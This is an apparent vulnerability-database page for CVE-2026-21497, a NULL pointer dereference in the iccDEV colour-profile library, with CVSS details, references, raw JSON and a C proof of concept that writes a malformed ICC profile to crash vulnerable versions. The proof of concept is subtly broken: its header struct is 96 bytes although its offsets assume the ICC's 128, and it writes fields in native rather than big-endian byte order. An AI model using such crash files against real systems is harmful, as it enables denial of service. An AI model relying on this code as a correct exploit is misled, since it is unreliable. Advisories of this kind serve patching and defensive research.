Security Vulnerability Report
CVE-2026-21497 CVSS 5.5 MEDIUM

Published: 2026-01-07 18:15:53
Last Modified: 2026-01-09 21:59:42

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via an unknown tag parser. This issue has been patched in version 2.3.1.2.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-21497 PoC - iccDEV NULL Pointer Dereference
 * This PoC generates a malicious ICC profile with an unknown tag
 * that triggers NULL pointer dereference in iccDEV < 2.3.1.2
 *
 * Usage: compile with iccDEV library and run
 * gcc -o poc poc.c -liccDEV
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ICC Profile Header Structure */
typedef struct {
    char size[4];              /* Profile size */
    char cmm_type[4];          /* CMM type */
    char version[4];           /* Profile version */
    char device_class[4];      /* Device class */
    char color_space[4];       /* Color space */
    char pcs[4];               /* PCS */
    char date[12];             /* Creation date */
    char signature[4];         /* 'acsp' */
    char platform[4];          /* Primary platform */
    char flags[4];             /* Profile flags */
    char manufacturer[4];      /* Device manufacturer */
    char model[4];             /* Device model */
    char attributes[4];        /* Device attributes */
    char rendering_intent[4];  /* Rendering intent */
    char illuminant[12];       /* PCS illuminant */
    char creator[4];           /* Profile creator */
    char profile_id[16];       /* Profile ID */
} ICC_Header;

/* Tag Table Entry */
typedef struct {
    char signature[4];  /* Tag signature */
    char offset[4];     /* Offset to tag data */
    char size[4];       /* Tag data size */
} TagEntry;

void create_malicious_icc_profile(const char* filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        printf("[-] Failed to create file\n");
        return;
    }

    /* Initialize header */
    ICC_Header header = {0};

    /* Set profile size (will be updated) */
    *(unsigned int*)header.size = 0x00000200;  /* 512 bytes */

    /* Set version to 2.3 */
    *(unsigned int*)header.version = 0x02300000;

    /* Set device class and color space */
    memcpy(header.device_class, "mntr", 4);  /* Monitor */
    memcpy(header.color_space, "RGB ", 4);
    memcpy(header.pcs, "Lab ", 4);
    memcpy(header.signature, "acsp", 4);

    /* Write header */
    fwrite(&header, sizeof(ICC_Header), 1, fp);

    /* Write tag count */
    unsigned int tag_count = 1;
    fwrite(&tag_count, 4, 1, fp);

    /* Create malicious tag entry with unknown signature */
    TagEntry tag = {0};
    memcpy(tag.signature, "XXXX", 4);  /* Unknown tag - triggers vulnerability */
    *(unsigned int*)tag.offset = 128 + sizeof(TagEntry) * tag_count;
    *(unsigned int*)tag.size = 12;
    fwrite(&tag, sizeof(TagEntry), 1, fp);

    /* Write padding */
    char padding[256] = {0};
    fwrite(padding, 256, 1, fp);

    fclose(fp);

    printf("[+] Malicious ICC profile created: %s\n", filename);
    printf("[+] Unknown tag signature 'XXXX' will trigger NULL pointer dereference\n");
}

int main(int argc, char* argv[]) {
    const char* output_file = "malicious_profile.icc";

    if (argc > 1) {
        output_file = argv[1];
    }

    printf("[*] Generating PoC for CVE-2026-21497\n");
    printf("[*] Target: iccDEV < 2.3.1.2\n");
    printf("[*] Vulnerability: NULL Pointer Dereference in tag parser\n");

    create_malicious_icc_profile(output_file);

    printf("[+] PoC generated successfully\n");
    printf("[+] To trigger: Load this ICC profile using vulnerable iccDEV version\n");

    return 0;
}

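References

https://github.com/InternationalColorConsortium/iccDEV/commit/9419cac7f084197941994b8b9d17def204008385 (Patch)
https://github.com/InternationalColorConsortium/iccDEV/issues/374 (Exploit, Issue Tracking)
https://github.com/InternationalColorConsortium/iccDEV/pull/403 (Issue Tracking)
https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7gv7-cmrv-4j85 (Third Party Advisory)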

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21497", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:53.483", "lastModified": "2026-01-09T21:59:42.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via an unknown tag parser. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color ICC. Antes de la versión 2.3.1.2, iccDEV es vulnerable a una desreferencia de puntero NULL mediante un analizador de etiquetas desconocido. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": 
"https://github.com/InternationalColorConsortium/iccDEV/commit/9419cac7f084197941994b8b9d17def204008385", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/374", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/403", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7gv7-cmrv-4j85", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}